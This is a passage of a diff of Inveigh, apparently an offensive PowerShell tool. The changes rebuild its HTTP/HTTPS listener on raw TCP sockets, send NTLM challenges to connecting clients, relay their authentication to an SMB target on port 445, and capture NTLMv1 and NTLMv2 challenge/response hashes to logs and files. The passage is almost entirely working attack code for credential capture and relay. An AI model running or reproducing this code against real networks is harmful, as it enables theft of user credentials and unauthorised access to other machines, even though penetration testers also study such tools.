@@ -1130,7 +2312,7 @@ $HTTP_scriptblock =
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
- $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null
+ $inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
@@ -1152,309 +2334,485 @@ $HTTP_scriptblock =
$NTLM_challenge = $HTTP_challenge
return $NTLM
+ }
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
}
-
- while ($inveigh.relay_running)
+ else
{
- $inveigh.context = $inveigh.HTTP_listener.GetContext()
- $inveigh.request = $inveigh.context.Request
- $inveigh.response = $inveigh.context.Response
- $inveigh.message = ''
- $NTLM = 'NTLM'
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
+ }
+
+ $HTTP_running = $true
+ $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+
+ try
+ {
+ $HTTP_listener.Start()
+ }
+ catch
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")])
+ $HTTP_running = $false
+ }
+
+ $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
+ $HTTP_client_close = $true
+ $relay_step = 0
+
+ :HTTP_listener_loop while ($inveigh.relay_running -and $HTTP_running)
+ {
+ $TCP_request = ""
+ $TCP_request_bytes = New-Object System.Byte[] 1024
+
+ while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
+ {
+ Start-Sleep -m 10
+
+ if(!$inveigh.relay_running)
+ {
+ break HTTP_listener_loop
+ }
- if($inveigh.request.IsSecureConnection)
+ }
+
+ if($SSL)
{
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_clear_stream = $HTTP_client.GetStream()
+ $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
+ $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
+ $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
+ }
+
+ [byte[]]$SSL_request_bytes = $null
+
+ do
+ {
+ $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
+ } while ($HTTP_clear_stream.DataAvailable)
+
+ $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
$HTTP_type = "HTTPS"
}
else
{
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_stream = $HTTP_client.GetStream()
+ }
+
+ while($HTTP_stream.DataAvailable)
+ {
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ }
+
+ $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
$HTTP_type = "HTTP"
+
}
- if ($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
{
- $inveigh.response.StatusCode = 200
- }
- else
- {
- $inveigh.response.StatusCode = 401
- }
+ $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
+ $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
- $HTTP_request_time = Get-Date -format 's'
+ if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
+ {
+ $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
+ $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
+ }
+ else
+ {
+ $authentication_header = ""
+ }
- if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)
- {
- $HTTP_raw_url_output = $false
- }
- else
- {
- $HTTP_raw_url_output = $true
- }
+ if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ {
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ }
+ else
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
+ }
- if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
- {
- $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
- }
+ $NTLM = "NTLM"
+ $NTLM_auth = $false
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
- $HTTP_request_raw_url_old = $inveigh.request.RawUrl
- $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
- $HTTP_request_time_old = $HTTP_request_time
-
- [String] $authentication_header = $inveigh.request.headers.getvalues('Authorization')
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+ }
- if($authentication_header.startswith('NTLM '))
- {
- $authentication_header = $authentication_header -replace 'NTLM ',''
- [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
- $inveigh.response.StatusCode = 401
-
- if ($HTTP_request_bytes[8] -eq 1)
+ if($authentication_header.startswith('NTLM '))
{
-
- if($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 0 -and $inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget)
+ $authentication_header = $authentication_header -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+ $HTTP_response_status_code = 0x34,0x30,0x31
+
+ if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
- $inveigh.SMB_relay_active_step = 1
- $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address + " at $(Get-Date -format 's')")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address)])
- $inveigh.console_queue.Add("Grabbing challenge for relay from $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $SMBRelayTarget)])
- $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
- $SMB_relay_socket.Connect($SMBRelayTarget,"445")
-
- if(!$SMB_relay_socket.connected)
+
+ if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")])
- $inveigh.SMB_relay_active_step = 0
- }
+ $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")])
+ $inveigh.console_queue.Add("Grabbing challenge for relay from $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)])
+ $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+ $SMB_relay_socket.Client.ReceiveTimeout = 60000
+ $SMB_relay_socket.Connect($Target,"445")
+ $HTTP_client_close = $false
+ $relay_step = 1
- if($inveigh.SMB_relay_active_step -eq 1)
- {
- $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
- $inveigh.SMB_relay_active_step = 2
- $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
- $SMB_user_ID = $SMB_relay_bytes[34..33]
- $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
- $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
- $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
- $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
- $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
- $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
- $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
- $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
- $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
- $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ if(!$SMB_relay_socket.connected)
+ {
+ $inveigh.console_queue.Add("SMB relay target is not responding")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")])
+ $relay_step = 0
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
+
+ if($SMB_relay_bytes.length -le 3)
+ {
+ $relay_step = 0
+ $NTLM = NTLMChallengeBase64 $Challenge
+ }
+
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_user_ID = $SMB_relay_bytes[34..33]
+ $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
+ $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
+ $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
+ $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
+ $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
+ $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
+ $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
+ $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
+ $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_session_ID = $SMB_relay_bytes[44..51]
+
+ if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version -eq 'SMB1'
+ }
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
- $SMB_domain_length_offset_bytes +
- 0x05,0x82,0x89,0xa2 +
- $SMB_relay_NTLM_challenge +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
- $SMB_target_length_offset_bytes +
- $SMB_relay_target_details
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $SMB_domain_length_offset_bytes +
+ 0x05,0x82 +
+ $SMB_relay_target_flag +
+ 0xa2 +
+ $SMB_relay_NTLM_challenge +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $SMB_target_length_offset_bytes +
+ $SMB_relay_target_details
- $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
- $NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
- $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $NTLM_challenge)
- $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")])
- $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)])
- $inveigh.SMB_relay_active_step = 3
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
+ $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")])
+ $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)])
+ $relay_step = 2
+ }
+ else
+ {
+ $NTLM = NTLMChallengeBase64 $Challenge
+ }
+
}
else
{
- $NTLM = NTLMChallengeBase64 $Challenge
+ $NTLM = NTLMChallengeBase64 $Challenge
}
+
+ $HTTP_response_status_code = 0x34,0x30,0x31
}
- else
+ elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
- $NTLM = NTLMChallengeBase64 $Challenge
- }
-
- $inveigh.response.StatusCode = 401
- }
- elseif ($HTTP_request_bytes[8] -eq 3)
- {
- $NTLM = 'NTLM'
- $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
- $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
- $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
- $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
- $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
- $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+ $NTLM = 'NTLM'
+ $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+ $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+ $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
- if($HTTP_NTLM_domain_length -eq 0)
- {
- $HTTP_NTLM_domain_string = ''
- }
- else
- {
- $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
- }
+ if($HTTP_NTLM_domain_length -eq 0)
+ {
+ $HTTP_NTLM_domain_string = ''
+ }
+ else
+ {
+ $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ }
- $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
- $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
- $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
- $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
- $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
-
- if($HTTP_NTLM_length -eq 24) # NTLMv1
- {
- $NTLM_type = "NTLMv1"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(48,':')
- $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+ $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+ $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+
+ if($HTTP_NTLM_length -eq 24) # NTLMv1
+ {
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(48,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
- $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
- $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
- if($inveigh.file_output)
- {
- $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ {
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ }
+ else
+ {
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ {
+ $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ }
+
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ {
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ }
+
}
}
-
- if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
- {
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
- }
-
- }
- else # NTLMv2
- {
- $NTLM_type = "NTLMv2"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(32,':')
- $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
-
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
- $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
- $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+ else # NTLMv2
+ {
+ $NTLM_type = "NTLMv2"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(32,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
- if($inveigh.file_output)
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
- }
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + ")")])
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + "):`n" + $HTTP_NTLM_hash)
- }
+ if($inveigh.file_output)
+ {
+ $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ }
+
+ }
- if ($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
- {
- $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
- }
+ if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+ {
+ $inveigh.IP_capture_list += $HTTP_source_IP
+ }
- }
+ }
- $inveigh.response.StatusCode = 200
- $NTLM_challenge = ''
- $HTTP_raw_url_output = $true
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $NTLM_auth = $true
+ $HTTP_client_close = $true
+ $NTLM_challenge = ""
+ #$HTTP_raw_url_output = $true
- if ($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 3)
- {
-
- if(!$SMBRelayUsernames -or $SMBRelayUsernames -contains $HTTP_NTLM_user_string -or $SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.SMB_relay -and $relay_step -eq 2)
{
- if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
+ if(!$Usernames -or $Usernames -contains $HTTP_NTLM_user_string -or $Usernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
+ if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
{
- if($NTLM_type -eq 'NTLMv2')
+ if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
{
- $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
- $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
- $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
-
- if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq '00-00-00-00')
+
